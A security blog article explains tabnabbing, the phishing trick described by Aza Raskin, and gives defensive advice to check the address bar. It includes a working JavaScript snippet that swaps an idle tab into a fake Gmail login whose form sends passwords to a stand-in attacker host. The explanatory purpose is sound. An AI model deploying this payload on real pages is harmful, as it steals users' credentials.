Tabnabbing - The new security threat
While we strongly advocate the use of tricky passwords and secure, regularly updated browsers (IE6 users, we’re looking at you - and so are Microsoft!) to ensure a phish-free online existence, Webmonkey has lifted the lid on a new attack method that’s a little harder to catch - and prevent.
“Tabnabbing,” as discoverer Aza Raskin has labelled it (widely misspelt “tabnapping”), is when a script running in a page you have left open in a tab you are not currently looking at quietly rewrites that page - title, favicon and contents - into a phishy impersonation of another site. And while that might sound easy enough to avoid, the big hook here is that the attacking script can probe your browsing history to work out which sites you use regularly, and pick its disguise to match. As explained by Webmonkey, “an attacker can hijack your page, detect that you frequently login to Citibank’s website and impersonate that site, complete with a message about automatically ending your session and asking you to login again.”
Before you sink into a pre-determined sea of woe though, there is a telling way to check if you are about to become the next tabnabbing victim - the URL will be wrong. A script can change the title, favicon and contents of its own tab, but it cannot change the address the browser shows without actually navigating away, so the address bar will still show the site you originally opened rather than your bank’s. So if you tend to use multiple tabs in your online time, be sure to have a peek at the URL bar when you flick to a tab that is suddenly asking you to log in again, and if something seems a bit odd, reload the page (which brings back the original) or type the site’s address in yourself rather than using the form in front of you.
For web developers keen to minimise the chance of this happening to their visitors, tabnabbing discoverer Aza Raskin has the following warning: “Every time you include a third-party script on your page, or a Flash widget, you leave yourself wide open for an evil doer to use your website as a staging ground for this kind of attack.” The reason is simple - a third-party script runs with exactly the same access to your page as your own code, so if it is compromised or malicious it can rewrite your page into a login form for somebody else’s site while the visitor is looking at another tab.
If you want to see some tabnabbing in action, check out Raskin’s post - after leaving it unattended for a few moments, we came back to find the page replaced with a Gmail login page. He has only used a screenshot of Gmail’s page for his demonstration, but a real attacker would be sure to load a working copy, complete with a form that sends whatever you type to them.
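To make the mechanism concrete, here is a small model of the swap Raskin demonstrated, written for this article as an added example (it is not Raskin’s code and not code from the page). The `tab` object exposes what a page script can change about its own tab (title, favicon, body) and what it can only read (`url`, `hidden`); `constructedTab` is a fake so the logic runs under Node, and `browserTab` adapts a real `document`. The idle delay, the `LOOKALIKE` payload, the `attacker.invalid` and `innocent-blog.example` hosts, and the use of the Page Visibility API (`visibilitychange`, `document.hidden`) rather than the window-blur trick Raskin’s 2010 demo relied on are all assumptions of this example.

```javascript
"use strict";

// Constructed phishing payload (assumption: what the idle tab is turned into).
const LOOKALIKE = {
  title: "Gmail: Email from Google",
  favicon: "https://attacker.invalid/gmail.ico",
  body: '<form action="https://attacker.invalid/collect" method="post">' +
        "<p>Your session has timed out. Please sign in again.</p>" +
        '<input name="Email"><input name="Passwd" type="password"></form>',
};

// Fake tab for running outside a browser (constructed values).
function constructedTab() {
  return {
    url: "https://innocent-blog.example/post/42", // what the address bar shows
    title: "Innocent Blog",
    favicon: "https://innocent-blog.example/favicon.ico",
    body: "<p>Some article text.</p>",
    hidden: false, // becomes true once the user switches to another tab
  };
}

// Adapter over a real document, same shape as constructedTab().
function browserTab(doc) {
  const icon = () => doc.querySelector('link[rel~="icon"]');
  return {
    get url() { return doc.location.href; }, // readable, not rewritable in place
    get title() { return doc.title; },
    set title(v) { doc.title = v; },
    get favicon() { const l = icon(); return l ? l.href : ""; },
    set favicon(v) {
      let l = icon();
      if (!l) { l = doc.createElement("link"); l.rel = "icon"; doc.head.appendChild(l); }
      l.href = v;
    },
    get body() { return doc.body.innerHTML; },
    set body(v) { doc.body.innerHTML = v; },
    get hidden() { return doc.hidden; },
  };
}

// The attack. schedule(fn, ms) is injected so a test can fire the delay on
// demand; in a browser pass setTimeout.
function armTabnab(tab, schedule, idleMs) {
  const state = { swapped: false };
  function onVisibilityChange() {
    if (!tab.hidden) return; // do nothing while the user is still looking
    schedule(() => {
      if (!tab.hidden || state.swapped) return; // user came back in time: stay quiet
      tab.title = LOOKALIKE.title;     // text in the tab strip
      tab.favicon = LOOKALIKE.favicon; // icon in the tab strip
      tab.body = LOOKALIKE.body;       // fake "session expired" login form
      state.swapped = true;            // tab.url is untouched: the script has no
    }, idleMs);                        // way to change the address bar in place
  }
  return { onVisibilityChange, state };
}

// The reader's check from the article: compare a tab before and after, and see
// which fields moved. The URL never shows up in the result, which is exactly
// why the address bar is the thing to look at.
function snapshot(tab) {
  return { url: tab.url, title: tab.title, favicon: tab.favicon, body: tab.body };
}
function changedFields(before, after) {
  return Object.keys(before).filter((k) => before[k] !== after[k]).sort();
}

// In a browser, wire the demo up for real; under Node this branch is skipped.
if (typeof document !== "undefined") {
  const nab = armTabnab(browserTab(document), setTimeout, 5000);
  document.addEventListener("visibilitychange", nab.onVisibilityChange);
}
```

Paste the block into any page you control, switch to another tab for a few seconds and come back: the tab title, icon and contents are now Gmail’s, while the address bar still shows your own page. That last fact is the whole defence.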
As Raskin states “it’s time for the browser to take a more active role in being your smart user agent”. So until super smart browsers are built to beat security issues like this, stay security savvy and check those URLs.